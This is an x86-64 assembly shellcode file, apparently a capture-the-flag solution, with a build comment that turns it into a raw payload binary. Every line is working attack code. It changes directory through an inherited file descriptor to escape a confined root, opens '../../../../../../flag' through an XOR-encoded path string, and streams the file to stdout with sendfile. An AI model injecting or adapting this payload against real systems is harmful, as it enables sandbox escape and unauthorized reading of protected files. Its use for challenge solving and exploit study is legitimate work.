.intel_syntax noprefix
_start:


    mov rdi,3
    mov rax, 0x51
    syscall
    /* push b'../../../../../../flag\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f2e
    xor [rsp], rax
    mov rax, 0x2e2f2e2e2f2e2e2f
    push rax
    mov rax, 0x2e2e2f2e2e2f2e2e
    push rax
    /* call open('rsp', 'O_RDONLY', 'rdx') */
    push 2 /* 2 */
    pop rax
    mov rdi, rsp
    xor esi, esi /* O_RDONLY */
    syscall
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 0x28 /* 0x28 */
    pop rax
    push 1
    pop rdi
    cdq /* rdx=0 */
    syscall
//gcc a.s -nostdlib && objcopy --dump-section .text=solve.bin a.out
